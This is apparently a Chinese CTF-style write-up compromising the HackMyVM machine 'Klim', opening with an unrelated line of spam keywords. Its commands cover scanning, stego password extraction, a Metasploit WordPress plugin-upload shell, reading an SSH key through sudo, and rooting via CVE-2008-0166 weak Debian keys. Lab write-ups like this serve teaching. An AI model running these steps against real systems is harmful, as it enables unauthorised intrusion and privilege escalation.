网站页脚模板,洛可可设计公司怎么样,网页升级紧急通知书,wordpress图片表单插件目录
一、测试环境
1、系统环境
2、使用工具/软件
二、测试目的
三、操作过程
1、信息搜集
2、Getshell
3、提权
CVE-2008-0166
四、结论 一、测试环境
1、系统环境 渗透机#xff1a;kali2021.1(192.168.159.127) 靶 机#xff1a;debian(192.168.159.27) 注意事…目录
一、测试环境
1、系统环境
2、使用工具/软件
二、测试目的
三、操作过程
1、信息搜集
2、Getshell
3、提权
CVE-2008-0166
四、结论 一、测试环境
1、系统环境 渗透机kali2021.1(192.168.159.127) 靶 机debian(192.168.159.27) 注意事项 ①该类型靶场只能在virtualBox上搭建因此将靶机设置为桥接网络方便进行渗透。攻击机kali也要桥接出来不然会出问题。 ②靶机启动失败设置中取消勾选usb即可
2、使用工具/软件 Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、gobuster(目录扫描)、cmseek(获取cms信息)、stegseek(分析图片隐藏信息)、msfconsole(漏洞利用模块)、ssh(远程登录) 测试网址http://192.168.159.27 靶场介绍由国外大佬搭建的靶场类似于vulnhub经常更新需要翻墙才能进。 地址https://hackmyvm.eu/machines/machine.php?vmKlim 二、测试目的
熟悉wordpress漏洞熟悉ssh登录流程以及CVE-2008-0166漏洞利用。获取2个flag。
三、操作过程
1、信息搜集
主机探测
arp-scan -l 靶机IP192.168.159.27 物理机IP192.168.159.241 端口和服务探测
nmap -sT -A -p- -T4 192.168.159.27
靶机开放了22端口(ssh服务)、80端口(web服务) 目录扫描
gobuster dir -u http://192.168.159.27 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt
有wordpress目录 扫描wordpress目录
gobuster dir -u http://192.168.159.27/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt 扫描wordpress/wp-content目录该目录存在uploads目录 查看wordpress信息
cmseek -u http://192.168.159.27/wordpress
获取用户名klim 2、Getshell
在wordpress/wp-content/uploads目录中找到一张图片 获取该图片查看是否有隐藏信息
stegseek image.jpg
可以看到找到了密码输出了文件是有东西的 查看文件发现是数据包而且有klim用户的密码
cat image.jpg.out klim/ss7WhrrnnHOZC%239bQn 数据包是经过url编码的将密码解码 klim/ss7WhrrnnHOZC#9bQn 现在可以登录wordpress了 在Plugins—Add New Plugin—Upload Plugin处可以上传文件直接上传木马会被拦 使用msfconsole模块集成利用上传插件漏洞
use exploit/unix/webapp/wp_admin_shell_upload
set rhost 192.168.159.27
set targeturi /wordpress
set username klim
set password ss7WhrrnnHOZC#9bQn
run
成功返回meterpreter会话 3、提权
获取交互式shell并查看sudo权限
python3 -c import pty;pty.spawn(/bin/bash)
sudo -l
看到能以klim用户身份执行/home/klim/tool工具 使用file查看该文件是一个可执行文件
file /home/klim/tool 使用help参数查看工具解析可以看出这是cat命令和cat命令一个作用
sudo -u klim /home/klim/tool --help 可以查看文件那么首先查看klim用户家目录的文件
存在.ssh目录查看私钥文件
ls -la /home/klim
sudo -u klim /home/klim/tool /home/klim/.ssh/id_rsa 将私钥写入id文件并ssh登录klim用户
vim id
chmod 600 id
ssh klim192.168.159.27 -i id 在当前目录查看user.txt
cat user.txt user.txt: 2fbef74059deaea1e5e11cff5a65b68e CVE-2008-0166 基于Debian的操作系统上的OpenSSL 0.9.8c-1到0.9.8g-9之前的版本使用随机数生成器生成可预测的数字这使得远程攻击者更容易对加密密钥进行暴力猜测攻击。 这个漏洞存在生成的ssh密钥便可被预测数量有限。所有ssh密钥对在如下地址下载
https://github.com/g0tmi1k/debian-ssh/blob/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2 下载完成后解压可以在rsa/2048目录下查看所有公钥私钥
tar -xjf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
ls 利用该漏洞需要找到公钥然后根据公钥找到私钥
寻找公钥文件发现在/opt目录下有个公钥文件正是root用户的公钥文件
find / -name id_rs* -ls 2/dev/null 根据公钥的加密信息去匹配已知公钥的编号 使用ssh登录私钥指定为该编号即可
ssh root192.168.159.27 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
cat root.txt root.txt: 60667e12c8ea62295de82d053d950e1f 四、结论
Wordpress的文件上传漏洞可以利用openssl的漏洞导致私钥可被查询出来。
